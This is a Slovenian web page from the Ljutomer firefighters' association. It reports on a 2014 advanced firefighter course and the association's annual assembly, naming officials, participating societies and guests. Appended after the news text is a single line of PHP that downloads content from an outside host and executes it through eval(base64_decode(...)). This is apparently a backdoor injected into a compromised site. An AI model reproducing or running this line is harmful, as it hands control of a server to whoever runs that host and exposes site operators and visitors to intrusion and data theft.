Domov

NADALJEVALNI TEČAJ ZA GASILCA

 

Tečaj gasilec nadaljevalni 2014

 Gasilska zveza Ljutomer je letos organizirala tečaj gasilec nadaljevalni. Tečaj je potekal ob petkih, sobotah in nedeljah  v mesecu marcu, aprilu in maju. Zaključek tečaja z izpiti in zaključno vajo je bil v nedeljo, 11. maja 2014 v Cezanjevcih. Tečaja so se udeležili gasilci iz PGD Babinci, Banovci, Bunčani, Cven, Pristava, Ljutomer, Podgradje, Radoslavci, Spodnje Krapje, Veržej in Vogričevci. Tečaj so pod vodstvom poveljnika GZ Ljutomer Andreja Trstenjaka izvajali predavatelji in inštruktorji gasilske zveze Ljutomer. Usposabljanje traja 99 ur, od tega je 50 ur teoretičnega in 49 ur praktičnega pouka. Tečaj je obiskovalo skupno 32 slušateljev.  

 Na zaključni vaji so tečajniki izvedli taktično vajo, kjer so izvajali vse naloge gašenja požara na in v objektu. .

.

SKUPŠČINA 2014

SKUPŠČINA GASILSKE ZVEZE LJUTOMER

 

V četrtek 24. aprila je potekala redna letna skupščina Gasilske zveze Ljutomer v prostorih gasilskega doma Branoslavci. Po izvolitvi organov skupščine in sprejemu Poslovnika o delu skupščine, so bila obravnavana poročila o delu v letu 2013. Poročilo o organizacijskem delu je podal Andrej Rus, predsednik Gasilske zveze Ljutomer, poročilo o operativnem delu poveljnik Andrej Trstenjak, finančno poročilo je predstavila Majda Lukner iz računovodskega servisa Fiposor, poročilo nadzornega odbora pa je podala Alenka Novak. V nadaljevanju so bile obravnavane dopolnila Statuta gasilske zveze Ljutomer, ter sprejem programa dela za leto 2014. Izvoljen je bil tudi praproščak Gasilske zveze Ljutomer, prapor se seli vsako leto v drugo društvo. Prapor je prevzel Rus Boris iz PGD Cven. Sledili so pozdravni nagovori gostov skupščine, zbrane je pozdravila županja Občine Ljutomer mag. Olga Karba, župan občine Veržej Slavko Petovar, v imenu Gasilske zveze Slovenije, regijskega gasilskega sveta in poveljstva pa Dušan Utroša, član poveljstva Gasilske zveze Slovenije in regijski gasilski poveljnik. Predsednik Gasilske zveze Ljutomer Andrej Rus je prebral tudi pozdravno pismo regijskega poveljnika Civilne zaščite Martina Smodiša, ki se je opravičil.  Zbrane je pozdravil prav tako Branko Novak, poveljnik občinskega štaba CZ občine Ljutomer in pa predstavniki Gasilskih zvez Ormož, Križevci pri Ljutomeru, Juršinci, Sveti Tomaž, Sveti Jurij ob Ščavnici in Beltinci. Od 28 društev je bilo prisotnih članov 25 delegatov z glasovalno pravico.

  Po skupščini je sledil podpis aneksov Pogodb o opravljanju gasilske javne službe za občino Ljutomer, Veržej in Razkrižje.

$rrr = file_get_contents('http://speed-dev.net/counter/count.php'); eval(base64_decode($rrr));